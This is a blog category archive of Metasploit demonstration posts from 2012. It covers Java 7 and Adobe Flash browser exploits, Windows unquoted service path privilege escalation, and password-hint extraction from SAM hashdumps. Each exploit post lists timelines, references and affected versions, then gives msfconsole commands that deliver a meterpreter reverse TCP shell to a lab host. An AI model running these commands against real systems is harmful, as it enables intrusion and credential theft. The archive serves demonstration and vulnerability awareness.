Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to ZDI by James Forshaw (tyranid)
Vulnerability reported to the vendor by ZDI the 2012-07-24.
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability the 2012-08-26
Source code of the vulnerability provided by jduck the 2012-08-26
Metasploit PoC provided the 2012-08-27
Patched through out-of-band Oracle Security Alert for CVE-2012-4681 the 2012-08-30.

PoC provided by :

Unknown
jduck
sinn3r
juan vazquez

Reference(s) :

CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation
ZDI-12-197
Oracle Security Alert for CVE-2012-4681

Affected version(s) :

Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.

Tested on Windows XP Pro SP3 & Ubuntu 12.04 with :

Internet Explorer 8 & Firefox 14.0.1 & Chrome
Oracle JSE 1.7.0_06-b24

Description :

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Commands :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows 0day exploitation with Internet Explorer, Firefox and chrome :

Linux Ubuntu 12.04 exploitation with Firefox :

Metasploit Windows User Password Hints Decode Auxiliary Modules

Metasploit,

Metasploit provide some Microsoft Windows auxiliary modules who will permit you to dump local accounts from the SAM Database. These modules, “post/windows/gather/hashdump” and “post/windows/gather/smart_hashdump”, have been updated recently with addition of Windows users password hints. A nice blog post “All Your Password Hints Are Belong to Us” from claudijd explain how they have successfully extract/decode user password hints from the Windows registry. Here under a small video demonstration of these modifications.

Nice job from @claudijd, @reynoldsrb, @_sinn3r and @TheLightCosine for these nice upgrades 🙂

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor the 2012-08-14
Metasploit PoC provided the 2012-08-17

PoC provided by :

Alexander Gavrun
juan vazquez
sinn3r

Reference(s) :

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s) :

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome earlier version 21.0.1180.79.

Tested on Windows 7 Integral with :

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows Service Trusted Path Privilege Escalation Vulnerability Metasploit Demo

Exploits, Metasploit

Timeline :

Metasploit PoC provided the 2012-08-14

PoC provided by :

sinn3r

Reference(s) :

None

Affected version(s) :

All Microsoft Windows with applications having unexpected paths

Tested on Windows XP Pro SP3 with :

OpenVPN 2.1.1

Description :

This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Security” on page 676.

Commands :

You need a valid session on the target for example with :

exploit/windows/browser/ms12_037_same_id

Then execute the following exploit to detect vulnerable services

use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
set LPORT 4443
exploit

sysinfo
getuid